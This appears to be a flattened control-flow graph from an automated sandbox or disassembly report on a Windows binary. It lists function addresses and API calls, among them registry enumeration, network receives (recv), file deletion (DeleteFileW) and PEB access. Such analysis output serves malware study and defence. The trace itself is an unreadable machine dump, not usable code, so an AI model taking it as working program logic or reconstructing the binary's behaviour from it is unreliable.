__ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13491->13239 13492->13491 13493 fb7a00 RtlAllocateHeap 13492->13493 13494 fafa04 13493->13494 13495 fa5c10 4 API calls 13494->13495 13496 fafa0b 13495->13496 13497 fb7a00 RtlAllocateHeap 13496->13497 13498 fafa1e 13497->13498 13499 fb7a00 RtlAllocateHeap 13498->13499 13500 fafa33 13499->13500 13501 fb7a00 RtlAllocateHeap 13500->13501 13502 fafa48 13501->13502 13503 fb7a00 RtlAllocateHeap 13502->13503 13504 fafa5a 13503->13504 13505 fae530 10 API calls 13504->13505 13507 fafa63 13505->13507 13506 fafb35 shared_ptr 13506->13239 13507->13506 13508 fb7a00 RtlAllocateHeap 13507->13508 13509 fafba5 13508->13509 13651 fa9580 13509->13651 13511 fafbb4 13666 fa9230 13511->13666 13513 fafbc3 13514 fb8320 RtlAllocateHeap 13513->13514 13515 fafbdb 13514->13515 13515->13515 13516 fb80c0 RtlAllocateHeap 13515->13516 13517 fafc8c 13516->13517 13518 fb7a00 RtlAllocateHeap 13517->13518 13519 fafca7 13518->13519 13520 fb7a00 RtlAllocateHeap 13519->13520 13521 fafcb9 13520->13521 13522 fb7a00 RtlAllocateHeap 13521->13522 13523 fb05d4 13522->13523 13524 fa5c10 4 API calls 13523->13524 13525 fb05db 13524->13525 13526 fb7a00 RtlAllocateHeap 13525->13526 13527 fb05f1 13526->13527 13528 fb7a00 RtlAllocateHeap 13527->13528 13529 fb0609 13528->13529 13530 fb7a00 RtlAllocateHeap 13529->13530 13531 fb0621 13530->13531 13532 fb7a00 RtlAllocateHeap 13531->13532 13533 fb0633 13532->13533 13534 fae530 10 API calls 13533->13534 13536 fb063c 13534->13536 13535 fb0880 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13535->13239 13536->13535 13537 fb7a00 RtlAllocateHeap 13536->13537 13538 fb0987 13537->13538 13539 fa5c10 4 API calls 13538->13539 13540 fb098e 13539->13540 13541 fb7a00 RtlAllocateHeap 13540->13541 13542 fb09a4 13541->13542 13543 fb7a00 RtlAllocateHeap 13542->13543 13544 fb09bc 13543->13544 13545 fb7a00 RtlAllocateHeap 13544->13545 13546 fb09d4 13545->13546 13547 fb7a00 RtlAllocateHeap 13546->13547 13548 fb12e0 13547->13548 13549 fae530 10 API calls 13548->13549 13550 fb12e9 13549->13550 13552 fb85f6 13551->13552 13552->13552 13553 fb860b 13552->13553 13554 fb8f40 RtlAllocateHeap 13552->13554 13553->13247 13554->13553 13561 fa8aea 13555->13561 13562 fa89d8 shared_ptr 13555->13562 13556 fb7a00 RtlAllocateHeap 13556->13562 13557 fa5c10 4 API calls 13557->13562 13558 fa8b20 13560 fb8200 RtlAllocateHeap 13558->13560 13559 fb80c0 RtlAllocateHeap 13559->13562 13560->13561 13561->13253 13562->13556 13562->13557 13562->13558 13562->13559 13562->13561 13565 fa5f18 13563->13565 13564 fa5ffe shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13564->13146 13565->13564 13566 fb80c0 RtlAllocateHeap 13565->13566 13567 fa6089 13566->13567 13568 fb80c0 RtlAllocateHeap 13567->13568 13569 fa60bd 13568->13569 13570 fb80c0 RtlAllocateHeap 13569->13570 13571 fa60ee 13570->13571 13572 fb80c0 RtlAllocateHeap 13571->13572 13573 fa611f 13572->13573 13574 fb80c0 RtlAllocateHeap 13573->13574 13575 fa6150 RegOpenKeyExA 13574->13575 13576 fa6493 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13575->13576 13580 fa61a3 __cftof 13575->13580 13576->13146 13577 fa6243 RegEnumValueA 13577->13580 13578 fb80c0 RtlAllocateHeap 13578->13580 13579 fb7a00 RtlAllocateHeap 13579->13580 13580->13576 13580->13577 13580->13578 13580->13579 13582 fa8d7f 13581->13582 13583 fb7a00 RtlAllocateHeap 13582->13583 13584 fa8d8f 13583->13584 13585 fa5c10 4 API calls 13584->13585 13586 fa8d9a 13585->13586 13587 fb80c0 RtlAllocateHeap 13586->13587 13588 fa8dec 13587->13588 13589 fb8220 RtlAllocateHeap 13588->13589 13590 fa8dfe shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13589->13590 13590->13199 13592 fa9080 13591->13592 13593 fb7a00 RtlAllocateHeap 13592->13593 13594 fa908f 13593->13594 13595 fa5c10 4 API calls 13594->13595 13596 fa909a 13595->13596 13597 fb80c0 RtlAllocateHeap 13596->13597 13598 fa90ec 13597->13598 13599 fb8220 RtlAllocateHeap 13598->13599 13600 fa90fe shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13599->13600 13600->13199 13602 fa8f00 13601->13602 13603 fb7a00 RtlAllocateHeap 13602->13603 13604 fa8f0f 13603->13604 13605 fa5c10 4 API calls 13604->13605 13606 fa8f1a 13605->13606 13607 fb80c0 RtlAllocateHeap 13606->13607 13608 fa8f6c 13607->13608 13609 fb8220 RtlAllocateHeap 13608->13609 13610 fa8f7e shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13609->13610 13610->13199 13612 fd674d __dosmaperr __freea ___std_exception_copy 13611->13612 13613 fd6762 13611->13613 13612->13403 13613->13612 13615 fda038 13613->13615 13616 fda050 13615->13616 13618 fda075 13615->13618 13616->13618 13619 fe0439 13616->13619 13618->13612 13621 fe0445 __fassign 13619->13621 13620 fe044d __dosmaperr ___std_exception_copy 13620->13618 13621->13620 13623 fe052b 13621->13623 13624 fe054d 13623->13624 13626 fe0551 __dosmaperr ___std_exception_copy 13623->13626 13624->13626 13627 fdfcc0 13624->13627 13626->13620 13628 fdfd0d 13627->13628 13629 fd690a __fassign GetPEB GetPEB RtlAllocateHeap 13628->13629 13633 fdfd1c __cftof 13629->13633 13630 fdb67d GetPEB GetPEB 13630->13633 13631 fdc719 GetPEB GetPEB RtlAllocateHeap __fassign 13631->13633 13632 fdffbc __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13632->13626 13633->13630 13633->13631 13633->13632 13635 fb86e0 13634->13635 13635->13635 13636 fb7760 RtlAllocateHeap 13635->13636 13637 fb86f9 13636->13637 13638 fb8f40 RtlAllocateHeap 13637->13638 13639 fb8714 13637->13639 13638->13639 13640 fb8f40 RtlAllocateHeap 13639->13640 13642 fb8769 13639->13642 13641 fb87b1 13640->13641 13641->13406 13642->13406 13644 fb7760 RtlAllocateHeap 13643->13644 13645 fb8439 13644->13645 13646 fb8454 13645->13646 13647 fb8f40 RtlAllocateHeap 13645->13647 13648 fb8f40 RtlAllocateHeap 13646->13648 13650 fb84a8 13646->13650 13647->13646 13649 fb84ee 13648->13649 13649->13456 13650->13456 13652 fa95d4 13651->13652 13653 fb80c0 RtlAllocateHeap 13652->13653 13654 fa961c 13653->13654 13655 fb7a00 RtlAllocateHeap 13654->13655 13658 fa9635 shared_ptr 13655->13658 13656 fa979f 13659 fa97fe 13656->13659 13660 fa98e0 13656->13660 13657 fb7a00 RtlAllocateHeap 13657->13658 13658->13656 13658->13657 13658->13660 13661 fa5c10 4 API calls 13658->13661 13664 fa9834 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13658->13664 13665 fb80c0 RtlAllocateHeap 13658->13665 13662 fb80c0 RtlAllocateHeap 13659->13662 13663 fb8200 RtlAllocateHeap 13660->13663 13661->13658 13662->13664 13663->13664 13664->13511 13665->13658 13667 fa9284 13666->13667 13668 fb80c0 RtlAllocateHeap 13667->13668 13669 fa92cc 13668->13669 13670 fb7a00 RtlAllocateHeap 13669->13670 13677 fa92e5 shared_ptr 13670->13677 13671 fa944f 13673 fb80c0 RtlAllocateHeap 13671->13673 13672 fb7a00 RtlAllocateHeap 13672->13677 13676 fa94c6 shared_ptr 13673->13676 13674 fa5c10 4 API calls 13674->13677 13675 fa9543 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13675->13513 13676->13675 13678 fb8200 RtlAllocateHeap 13676->13678 13677->13671 13677->13672 13677->13674 13677->13676 13679 fb80c0 RtlAllocateHeap 13677->13679 13680 fa9578 13678->13680 13679->13677 13682 fa5610 13681->13682 13684 fa5710 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13682->13684 13685 fa22c0 13682->13685 13684->13265 13688 fa2280 13685->13688 13689 fa2296 13688->13689 13692 fd87f8 13689->13692 13695 fd7609 13692->13695 13694 fa22a4 13694->13682 13696 fd7649 13695->13696 13698 fd7631 __dosmaperr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z ___std_exception_copy 13695->13698 13697 fd690a __fassign 3 API calls 13696->13697 13696->13698 13699 fd7661 13697->13699 13698->13694 13701 fd7bc4 13699->13701 13703 fd7bd5 13701->13703 13702 fd7be4 __dosmaperr ___std_exception_copy 13702->13698 13703->13702 13704 fd7dc2 GetPEB GetPEB RtlAllocateHeap 13703->13704 13705 fd7de8 GetPEB GetPEB RtlAllocateHeap 13703->13705 13706 fd7f36 GetPEB GetPEB RtlAllocateHeap 13703->13706 13707 fd8168 GetPEB GetPEB RtlAllocateHeap 13703->13707 13704->13703 13705->13703 13706->13703 13707->13703 13709 fa22e0 std::invalid_argument::invalid_argument RtlAllocateHeap 13708->13709 13710 fbc0fb 13709->13710 13710->13399 13714 fd8868 13711->13714 13713 fd8bdc 13713->12766 13715 fd887a 13714->13715 13716 fd690a __fassign 3 API calls 13715->13716 13719 fd888f __dosmaperr ___std_exception_copy 13715->13719 13718 fd88bf 13716->13718 13717 fd6d52 3 API calls 13717->13718 13718->13717 13718->13719 13719->13713 13721 fa22e0 std::invalid_argument::invalid_argument RtlAllocateHeap 13720->13721 13722 fbc16f 13721->13722 13722->12866 13724 fb80c0 RtlAllocateHeap 13723->13724 13731 fa4707 shared_ptr 13724->13731 13725 fa4976 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13725->12897 13726 fb80c0 RtlAllocateHeap 13730 fa4846 shared_ptr 13726->13730 13727 fb80c0 RtlAllocateHeap 13727->13731 13728 fb8f40 RtlAllocateHeap 13728->13730 13729 fb8f40 RtlAllocateHeap 13729->13731 13730->13725 13730->13726 13730->13728 13732 fa4994 13730->13732 13731->13727 13731->13729 13731->13730 13731->13732 13733 fb80c0 RtlAllocateHeap 13732->13733 13734 fa49f3 13733->13734 13735 fb80c0 RtlAllocateHeap 13734->13735 13736 fa4a0c 13735->13736 13737 fa4690 RtlAllocateHeap 13736->13737 13738 fa4a99 shared_ptr 13737->13738 13738->12897 13742 fba210 13743 fba290 13742->13743 13755 fb71d0 13743->13755 13745 fba2cc 13748 fba330 13745->13748 13763 fb7d50 13745->13763 13775 fa3840 13748->13775 13749 fba39e shared_ptr 13750 fbd3e2 RtlAllocateHeap 13749->13750 13752 fba4be shared_ptr 13749->13752 13751 fba45e 13750->13751 13783 fa3ee0 13751->13783 13754 fba4a6 13756 fb7211 13755->13756 13757 fbd3e2 RtlAllocateHeap 13756->13757 13758 fb7238 13757->13758 13759 fb7446 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13758->13759 13760 fbd3e2 RtlAllocateHeap 13758->13760 13759->13745 13761 fb73bb __cftof 13760->13761 13789 fa2ec0 13761->13789 13764 fb7dcb 13763->13764 13765 fb7d62 13763->13765 13766 fa2480 RtlAllocateHeap 13764->13766 13767 fb7d6d 13765->13767 13768 fb7d9c 13765->13768 13770 fb7d7a 13766->13770 13767->13764 13771 fb7d74 13767->13771 13769 fb7db9 13768->13769 13773 fbd3e2 RtlAllocateHeap 13768->13773 13769->13748 13770->13748 13772 fbd3e2 RtlAllocateHeap 13771->13772 13772->13770 13774 fb7da6 13773->13774 13774->13748 13776 fa385f 13775->13776 13777 fa38f6 13775->13777 13776->13777 13779 fa38cd shared_ptr 13776->13779 13782 fa391b 13776->13782 13777->13749 13778 fb91e0 RtlAllocateHeap 13780 fa3925 13778->13780 13781 fb7d50 RtlAllocateHeap 13779->13781 13780->13749 13781->13777 13782->13778 13784 fa3f48 13783->13784 13785 fa3f1e 13783->13785 13786 fa3f58 13784->13786 13838 fa2c00 13784->13838 13785->13754 13786->13754 13790 fa2f7e GetCurrentThreadId 13789->13790 13791 fa2f06 13789->13791 13792 fa2fef 13790->13792 13793 fa2f94 13790->13793 13794 fbc6ac GetSystemTimePreciseAsFileTime 13791->13794 13792->13759 13793->13792 13801 fbc6ac GetSystemTimePreciseAsFileTime 13793->13801 13795 fa2f12 13794->13795 13796 fa301e 13795->13796 13797 fa2f1d 13795->13797 13798 fbc26a 4 API calls 13796->13798 13799 fbd3e2 RtlAllocateHeap 13797->13799 13803 fa2f30 __Mtx_unlock 13797->13803 13800 fa3024 13798->13800 13799->13803 13804 fbc26a 4 API calls 13800->13804 13802 fa2fb9 13801->13802 13806 fbc26a 4 API calls 13802->13806 13807 fa2fc0 __Mtx_unlock 13802->13807 13803->13800 13805 fa2f6f 13803->13805 13804->13802 13805->13790 13805->13792 13806->13807 13808 fbc26a 4 API calls 13807->13808 13809 fa2fd8 __Cnd_broadcast 13807->13809 13808->13809 13809->13792 13810 fbc26a 4 API calls 13809->13810 13811 fa303c 13810->13811 13812 fbc6ac GetSystemTimePreciseAsFileTime 13811->13812 13820 fa3080 shared_ptr __Mtx_unlock 13812->13820 13813 fa31c5 13814 fbc26a 4 API calls 13813->13814 13815 fa31cb 13814->13815 13816 fbc26a 4 API calls 13815->13816 13817 fa31d1 13816->13817 13818 fbc26a 4 API calls 13817->13818 13826 fa3193 __Mtx_unlock 13818->13826 13819 fa31a7 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13819->13759 13820->13813 13820->13815 13820->13819 13822 fa3132 GetCurrentThreadId 13820->13822 13821 fbc26a 4 API calls 13823 fa31dd 13821->13823 13822->13819 13824 fa313b 13822->13824 13824->13819 13825 fbc6ac GetSystemTimePreciseAsFileTime 13824->13825 13827 fa315f 13825->13827 13826->13819 13826->13821 13827->13813 13827->13817 13827->13826 13829 fbbd4c 13827->13829 13832 fbbb72 13829->13832 13831 fbbd5c 13831->13827 13833 fbbb9c 13832->13833 13834 fbcf6b _xtime_get GetSystemTimePreciseAsFileTime 13833->13834 13837 fbbba4 __Xtime_diff_to_millis2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13833->13837 13835 fbbbcf __Xtime_diff_to_millis2 13834->13835 13836 fbcf6b _xtime_get GetSystemTimePreciseAsFileTime 13835->13836 13835->13837 13836->13837 13837->13831 13839 fbd3e2 RtlAllocateHeap 13838->13839 13840 fa2c0e 13839->13840 13848 fbb847 13840->13848 13842 fa2c49 13842->13754 13843 fa2c42 13843->13842 13854 fa2c80 13843->13854 13845 fa2c58 13857 fa2560 13845->13857 13847 fa2c65 std::_Xinvalid_argument 13849 fbb873 Concurrency::details::_Reschedule_chore 13848->13849 13850 fbb854 13848->13850 13849->13843 13860 fbcb77 13850->13860 13852 fbb864 13852->13849 13862 fbb81e 13852->13862 13868 fbb7fb 13854->13868 13856 fa2cb2 shared_ptr 13856->13845 13858 fd38af ___std_exception_copy RtlAllocateHeap 13857->13858 13859 fa2597 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13858->13859 13859->13847 13861 fbcb92 CreateThreadpoolWork 13860->13861 13861->13852 13863 fbb827 Concurrency::details::_Reschedule_chore 13862->13863 13866 fbcdcc 13863->13866 13865 fbb841 13865->13849 13867 fbcde1 TpPostWork 13866->13867 13867->13865 13869 fbb807 13868->13869 13870 fbb817 13868->13870 13869->13870 13872 fbca78 13869->13872 13870->13856 13873 fbca8d TpReleaseWork 13872->13873 13873->13870 13927 fb87d0 13928 fbd3e2 RtlAllocateHeap 13927->13928 13929 fb882a __cftof 13928->13929 13937 fb9bb0 13929->13937 13931 fb8854 13934 fb886c __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13931->13934 13941 fa43f0 13931->13941 13936 fb88df 13938 fb9be5 13937->13938 13950 fa2ce0 13938->13950 13940 fb9c16 13940->13931 13942 fbbedf InitOnceExecuteOnce 13941->13942 13943 fa440a 13942->13943 13944 fa4411 13943->13944 13945 fd6cbb 2 API calls 13943->13945 13947 fbbe50 13944->13947 13946 fa4424 13945->13946 13994 fbbd8b 13947->13994 13949 fbbe66 std::_Xinvalid_argument std::_Throw_future_error 13949->13936 13951 fa2d1d 13950->13951 13952 fbbedf InitOnceExecuteOnce 13951->13952 13953 fa2d46 13952->13953 13954 fa2d51 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13953->13954 13955 fa2d88 13953->13955 13959 fbbef7 13953->13959 13954->13940 13968 fa2440 13955->13968 13960 fbbf03 13959->13960 13971 fa2900 13960->13971 13962 fbbf23 std::_Xinvalid_argument 13963 fbbf6a 13962->13963 13964 fbbf73 13962->13964 13979 fbbe7f 13963->13979 13966 fa2ae0 3 API calls 13964->13966 13967 fbbf6f 13966->13967 13967->13955 13989 fbb5d6 13968->13989 13970 fa2472 13972 fb80c0 RtlAllocateHeap 13971->13972 13973 fa294f 13972->13973 13974 fa26b0 RtlAllocateHeap 13973->13974 13976 fa2967 13974->13976 13975 fa298d shared_ptr 13975->13962 13976->13975 13977 fd38af ___std_exception_copy RtlAllocateHeap 13976->13977 13978 fa29e4 13977->13978 13978->13962 13980 fbcc31 InitOnceExecuteOnce 13979->13980 13981 fbbe97 13980->13981 13982 fbbe9e 13981->13982 13985 fd6cbb 13981->13985 13982->13967 13986 fd6cc7 __fassign 13985->13986 13987 fd8bec __fassign 2 API calls 13986->13987 13988 fd6cf6 13987->13988 13991 fbb5f1 std::_Xinvalid_argument 13989->13991 13990 fd8bec __fassign 2 API calls 13992 fbb69f 13990->13992 13991->13990 13993 fbb658 __fassign __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13991->13993 13993->13970 13995 fa22e0 std::invalid_argument::invalid_argument RtlAllocateHeap 13994->13995 13996 fbbd9f 13995->13996 13996->13949 13739 fd6629 13740 fd64c7 __fassign 2 API calls 13739->13740 13741 fd663a 13740->13741 14069 fbb92e 14070 fbb7b5 5 API calls 14069->14070 14071 fbb956 14070->14071 14072 fbb718 5 API calls 14071->14072 14073 fbb96f 14072->14073 12056 fd6a44 12057 fd6a5c 12056->12057 12058 fd6a52 12056->12058 12067 fd698d 12057->12067 12059 fdb655 DeleteFileW 12058->12059 12061 fd6a59 12059->12061 12062 fd6a76 12070 fd68ed 12062->12070 12066 fd6a8a __freea 12075 fd690a 12067->12075 12069 fd699f 12069->12062 12137 fd683b 12070->12137 12072 fd6905 12072->12066 12073 fdb655 DeleteFileW 12072->12073 12074 fdb667 __dosmaperr 12073->12074 12074->12066 12076 fd692a 12075->12076 12080 fd6921 12075->12080 12076->12080 12081 fdb5fb 12076->12081 12080->12069 12082 fdb60e 12081->12082 12083 fd6960 12081->12083 12082->12083 12089 fdf5ab 12082->12089 12085 fdb628 12083->12085 12086 fdb63b 12085->12086 12087 fdb650 12085->12087 12086->12087 12120 fde6b1 12086->12120 12087->12080 12091 fdf5b7 __fassign 12089->12091 12090 fdf606 12090->12083 12091->12090 12094 fd8bec 12091->12094 12093 fdf62b 12095 fd8bf1 __fassign 12094->12095 12098 fd8bfc ___std_exception_copy 12095->12098 12100 fdd634 12095->12100 12105 fd65ed 12098->12105 12099 fd8c2f __dosmaperr __fassign 12099->12093 12101 fdd640 __fassign 12100->12101 12102 fd65ed __fassign 2 API calls 12101->12102 12103 fdd69c __dosmaperr __fassign ___std_exception_copy 12101->12103 12104 fdd82e __dosmaperr __fassign 12102->12104 12103->12098 12104->12098 12108 fd64c7 12105->12108 12109 fd64d5 __fassign 12108->12109 12110 fd6520 12109->12110 12113 fd652b 12109->12113 12110->12099 12118 fda302 GetPEB 12113->12118 12115 fd6535 12116 fd653a GetPEB 12115->12116 12117 fd654a __fassign 12115->12117 12116->12117 12119 fda31c __fassign 12118->12119 12119->12115 12121 fde6bb 12120->12121 12124 fde5c9 12121->12124 12123 fde6c1 12123->12087 12128 fde5d5 __fassign __freea 12124->12128 12125 fde5f6 12125->12123 12126 fd8bec __fassign 2 API calls 12127 fde668 12126->12127 12129 fde6a4 12127->12129 12133 fda72e 12127->12133 12128->12125 12128->12126 12129->12123 12134 fda751 12133->12134 12135 fd8bec __fassign 2 API calls 12134->12135 12136 fda7c7 12135->12136 12138 fd6863 12137->12138 12140 fd6849 __dosmaperr __fassign 12137->12140 12139 fd686a 12138->12139 12142 fd6889 __fassign 12138->12142 12139->12140 12144 fd69e6 12139->12144 12140->12072 12142->12140 12143 fd69e6 RtlAllocateHeap 12142->12143 12143->12140 12145 fd69f4 12144->12145 12148 fd6a25 12145->12148 12151 fdb04b 12148->12151 12150 fd6a05 12150->12140 12153 fdb087 __dosmaperr 12151->12153 12154 fdb059 __fassign 12151->12154 12152 fdb074 RtlAllocateHeap 12152->12153 12152->12154 12153->12150 12154->12152 12154->12153 12199 fac8e0 12200 fac937 12199->12200 12205 fb8de0 12200->12205 12202 fac94c 12203 fb8de0 RtlAllocateHeap 12202->12203 12204 fac988 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12203->12204 12206 fb8f2f 12205->12206 12208 fb8e05 12205->12208 12217 fb9270 12206->12217 12211 fb8e4c 12208->12211 12212 fb8e76 12208->12212 12209 fb8f34 12210 fa2480 RtlAllocateHeap 12209->12210 12216 fb8e5d shared_ptr __cftof 12210->12216 12211->12209 12213 fb8e57 12211->12213 12215 fbd3e2 RtlAllocateHeap 12212->12215 12212->12216 12214 fbd3e2 RtlAllocateHeap 12213->12214 12214->12216 12215->12216 12216->12202 12220 fbc1b9 12217->12220 12223 fbc123 12220->12223 12222 fbc1ca std::_Xinvalid_argument 12226 fa22e0 12223->12226 12225 fbc135 12225->12222 12227 fd38af ___std_exception_copy RtlAllocateHeap 12226->12227 12228 fa2317 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12227->12228 12228->12225 12244 fae0c0 recv 12245 fae122 recv 12244->12245 12246 fae157 recv 12245->12246 12247 fae191 12246->12247 12248 fae2b3 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12247->12248 12253 fbc6ac 12247->12253 12260 fbc452 12253->12260 12255 fae2ee 12256 fbc26a 12255->12256 12257 fbc292 12256->12257 12258 fbc274 12256->12258 12257->12257 12258->12257 12277 fbc297 12258->12277 12261 fbc4a8 12260->12261 12263 fbc47a __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12260->12263 12261->12263 12266 fbcf6b 12261->12266 12263->12255 12264 fbc4fd __Xtime_diff_to_millis2 12264->12263 12265 fbcf6b _xtime_get GetSystemTimePreciseAsFileTime 12264->12265 12265->12264 12267 fbcf7a 12266->12267 12269 fbcf87 __aulldvrm 12266->12269 12267->12269 12270 fbcf44 12267->12270 12269->12264 12273 fbcbea 12270->12273 12274 fbcbfb GetSystemTimePreciseAsFileTime 12273->12274 12275 fbcc07 12273->12275 12274->12275 12275->12269 12282 fa2ae0 12277->12282 12281 fbc2bf std::_Xinvalid_argument 12281->12258 12294 fbbedf 12282->12294 12284 fa2aff 12288 fbc1ff 12284->12288 12285 fd8bec __fassign 2 API calls 12287 fd6cf6 12285->12287 12286 fa2af4 __fassign 12286->12284 12286->12285 12289 fbc20b __EH_prolog3_GS 12288->12289 12301 fb80c0 12289->12301 12291 fbc23d 12314 fa26b0 12291->12314 12293 fbc252 12293->12281 12297 fbcc31 12294->12297 12298 fbcc3f InitOnceExecuteOnce 12297->12298 12300 fbbef2 12297->12300 12298->12300 12300->12286 12303 fb8104 12301->12303 12305 fb80de 12301->12305 12302 fb9270 RtlAllocateHeap 12304 fb81f3 12302->12304 12307 fb8158 12303->12307 12308 fb817d 12303->12308 12312 fb8169 12303->12312 12306 fa2480 RtlAllocateHeap 12304->12306 12305->12291 12309 fb81f8 12306->12309 12307->12304 12311 fbd3e2 RtlAllocateHeap 12307->12311 12310 fbd3e2 RtlAllocateHeap 12308->12310 12308->12312 12310->12312 12311->12312 12312->12302 12313 fb81d0 shared_ptr 12312->12313 12313->12291 12315 fb7a00 RtlAllocateHeap 12314->12315 12317 fa2702 12315->12317 12316 fa2725 12319 fb8f40 RtlAllocateHeap 12316->12319 12321 fa278e shared_ptr 12316->12321 12317->12316 12323 fb8f40 12317->12323 12319->12321 12320 fd38af ___std_exception_copy RtlAllocateHeap 12322 fa284b shared_ptr ___std_exception_destroy __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12320->12322 12321->12320 12321->12322 12322->12293 12324 fb8f6b 12323->12324 12325 fb908e 12323->12325 12329 fb8fdc 12324->12329 12330 fb8fb2 12324->12330 12326 fb9270 RtlAllocateHeap 12325->12326 12327 fb9093 12326->12327 12328 fa2480 RtlAllocateHeap 12327->12328 12334 fb8fc3 12328->12334 12333 fbd3e2 RtlAllocateHeap 12329->12333 12329->12334 12330->12327 12331 fb8fbd 12330->12331 12332 fbd3e2 RtlAllocateHeap 12331->12332 12332->12334 12333->12334 12335 fb90b8 12334->12335 12337 fa2480 std::_Xinvalid_argument 12334->12337 12338 fb904c shared_ptr 12334->12338 12336 fbd3e2 RtlAllocateHeap 12335->12336 12336->12338 12339 fd38af ___std_exception_copy RtlAllocateHeap 12337->12339 12338->12316 12340 fa24c3 12339->12340 12340->12316 14005 fab1a0 14006 fab1f2 14005->14006 14007 fb80c0 RtlAllocateHeap 14006->14007 14008 fab233 14007->14008 14009 fb7a00 RtlAllocateHeap 14008->14009 14010 fab2dd 14009->14010 14052 fa8780 14053 fa8786 14052->14053 14054 fa87a6 14053->14054 14055 fd67b7 3 API calls 14053->14055 14056 fa87a0 14055->14056 14074 fae500 14075 fae525 14074->14075 14077 fae509 14074->14077 14077->14075 14078 fae360 14077->14078 14079 fae370 __dosmaperr 14078->14079 14080 fd8ab6 3 API calls 14079->14080 14081 fae3ad 14080->14081 14082 fbc199 std::_Xinvalid_argument RtlAllocateHeap 14081->14082 14084 fae4fe 14082->14084 14083 fae525 14083->14077 14084->14083 14085 fae360 4 API calls 14084->14085 14085->14084 12229 fb88e0 12230 fb8ac7 12229->12230 12232 fb8936 12229->12232 12241 fb91e0 12230->12241 12233 fb8ac2 12232->12233 12234 fb897c 12232->12234 12235 fb89a3 12232->12235 12236 fa2480 RtlAllocateHeap 12233->12236 12234->12233 12237 fb8987 12234->12237 12239 fbd3e2 RtlAllocateHeap 12235->12239 12240 fb898d shared_ptr 12235->12240 12236->12230 12238 fbd3e2 RtlAllocateHeap 12237->12238 12238->12240 12239->12240 12242 fbc1b9 RtlAllocateHeap 12241->12242 12243 fb91ea 12242->12243 13874 fb93e0 13875 fb93f5 13874->13875 13881 fb9433 13874->13881 13882 fbd111 13875->13882 13885 fbd122 13882->13885 13883 fb93ff 13883->13881 13886 fbd64e 13883->13886 13885->13883 13893 fbd199 13885->13893 13897 fbd621 13886->13897 13889 fbd0c7 13890 fbd0d7 13889->13890 13891 fbd17f 13890->13891 13892 fbd17b RtlWakeAllConditionVariable 13890->13892 13891->13881 13892->13881 13894 fbd1a7 SleepConditionVariableCS 13893->13894 13896 fbd1c0 13893->13896 13894->13896 13896->13885 13898 fbd630 13897->13898 13899 fbd637 13897->13899 13903 fd988e 13898->13903 13906 fd98fa 13899->13906 13902 fb9429 13902->13889 13904 fd98fa RtlAllocateHeap 13903->13904 13905 fd98a0 13904->13905 13905->13902 13909 fd9630 13906->13909 13908 fd992b 13908->13902 13910 fd963c __fassign 13909->13910 13913 fd968b 13910->13913 13912 fd9657 13912->13908 13914 fd96a7 13913->13914 13915 fd9714 __fassign __freea 13913->13915 13914->13915 13918 fd96f4 __freea 13914->13918 13919 fdedf6 13914->13919 13915->13912 13917 fdedf6 RtlAllocateHeap 13917->13915 13918->13915 13918->13917 13920 fdee03 13919->13920 13922 fdee0f __cftof __dosmaperr 13920->13922 13923 fe500f 13920->13923 13922->13918 13924 fe501c 13923->13924 13926 fe5024 __dosmaperr __fassign __freea 13923->13926 13925 fdb04b __fassign RtlAllocateHeap 13924->13925 13925->13926 13926->13922 13997 fb79c0 13998 fb79e0 13997->13998 13998->13998 13999 fb80c0 RtlAllocateHeap 13998->13999 14000 fb79f2 13999->14000

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
